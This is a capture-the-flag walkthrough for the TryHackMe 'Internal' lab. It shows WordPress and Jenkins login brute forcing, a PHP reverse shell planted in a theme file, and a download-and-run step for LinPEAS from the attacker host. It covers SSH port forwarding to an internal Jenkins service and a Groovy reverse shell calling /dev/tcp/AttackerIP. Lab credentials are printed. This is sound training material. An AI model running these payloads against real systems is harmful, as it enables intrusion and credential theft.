Internal — TryHackMe Walkthrough

A detailed guide to pwning the Internal machine with WordPress exploitation, SSH pivoting, and Jenkins compromise

Md Fahim Al Shihab

~3 min read · January 27, 2026 (Updated: January 27, 2026) · Free: Yes

Topics: Cybersecurity, Penetration Testing, TryHackMe, Ethical Hacking, WordPress

Introduction

Internal is an intermediate-level boot-to-root challenge that tests your skills in web application exploitation, privilege escalation, and network pivoting. This walkthrough will guide you through compromising a WordPress installation, leveraging SSH tunneling to access internal services, and exploiting Jenkins for root access.

Difficulty: Medium

Target: Internal.thm

Initial Reconnaissance

Let's start with a comprehensive Nmap scan to identify open ports and services:

sudo nmap -sC -sV -A 10.48.129.117

Discovered Services

• Port 22: SSH (OpenSSH 7.6p1 Ubuntu 4ubuntu0.3)

• Port 80: HTTP (Apache httpd 2.4.29)

We also run Nikto for web vulnerability scanning:

nikto -h internal.thm

Web Enumeration

Directory Brute-forcing

Using multiple tools to discover hidden directories:

feroxbuster -u 'http://10.48.129.117' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

gobuster dir — url "http://internal.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

WordPress Discovery

A WordPress installation is found at /blog/. Let's enumerate it:

wpscan — url http://internal.thm/blog/

WordPress Exploitation

Brute-forcing WordPress Admin

We discovered the admin username and proceed with password brute-forcing:

wpscan — url "http://internal.thm/blog/" -U "admin" -P /usr/share/wordlists/rockyou.txt

Successfully obtained credentials!

Getting a Reverse Shell

With admin access, we can inject a PHP reverse shell:

1. Navigate to Appearance → Theme Editor → 404.php

2. Replace the content with a PHP reverse shell from pentestmonkey's repo:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

3. Set up a listener:

nc -nvlp 4444

4. Trigger the shell by visiting the 404 page

Shell Stabilization

Once we get the reverse shell, upgrade to a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation — First User

Enumeration with LinPEAS

Transfer and run LinPEAS for automated enumeration:

https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

On attacker machine:

python3 -m http.server

On target machine:

wget http://attackerIP:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Found Credentials

LinPEAS reveals credentials in /opt/:

www-data@internal:/opt$ cat wp-save.txt

aubreanna:bubb13guM!@#123

SSH Access

ssh aubreanna@10.48.129.117

Network Pivoting

Internal Jenkins Service

After logging in as aubreanna, we find an interesting note:

aubreanna@internal:~$ cat jenkins.txt

Internal Jenkins service is running on 172.17.0.2:8080

The address 172.17.0.2 is part of Docker's internal network, inaccessible directly from our machine. We need to pivot!

SSH Port Forwarding

We'll create an SSH tunnel to access the internal Jenkins service:

ssh -N -L 1234:172.17.0.2:8080 aubreanna@10.48.185.39

Flag breakdown:

• -N → No shell (clean tunnel, no command execution)

• -L → Local port forwarding (our port 1234 → target's 172.17.0.2:8080)

Verify the Tunnel

Scan localhost to confirm Jenkins is accessible:

nmap -sCV -p 1234 localhost

Results:

PORT STATE SERVICE VERSION

1234/tcp open http Jetty 9.4.30.v20200611

|_http-server-header: Jetty(9.4.30.v20200611)

|_http-title: Site doesn't have a title (text/html;charset=utf-8).

| http-robots.txt: 1 disallowed entry

Jenkins Exploitation

Directory Enumeration

gobuster dir — url "http://localhost:1234/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Vulnerability Scanning

nikto -h localhost:1234

Brute-forcing Jenkins Login

Using Hydra to crack the Jenkins admin password:

hydra localhost -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -s 1234 -V -l admin -P /usr/share/wordlists/rockyou.txt

Getting Root Shell via Script Console

With Jenkins admin access, we can execute Groovy scripts:

1. Navigate to Jenkins → Manage Jenkins → Script Console

2. Execute the following Groovy reverse shell:

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/AttackerIP/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

3. Set up a listener on your machine:

nc -nvlp 4444

Root Credentials

After getting the shell, check /opt/ for the final credentials:

cd /opt

cat note.txt

Root credentials found:

root:tr0ub13guM!@#123

═══════════════════════════════════════════════════════════════════

Summary

This machine required a multi-stage attack:

1. WordPress brute-force → Initial foothold via theme editor reverse shell

2. LinPEAS enumeration → Discovered user credentials

3. SSH pivoting → Accessed internal Jenkins service via port forwarding

4. Jenkins exploitation → Used Script Console for root shell

Key Takeaways

• Always enumerate internal services mentioned in found files

• SSH tunneling is powerful for accessing internal networks

• Jenkins Script Console is a direct path to code execution

• Credential reuse is common — always try discovered passwords elsewhere

Tools Used

• Nmap

• Nikto

• Feroxbuster

• Gobuster

• WPScan

• Hydra

• LinPEAS

• Netcat

Happy Hacking! 🔓

#cybersecurity #tryhackme #hacking #penetration-testing #wordpress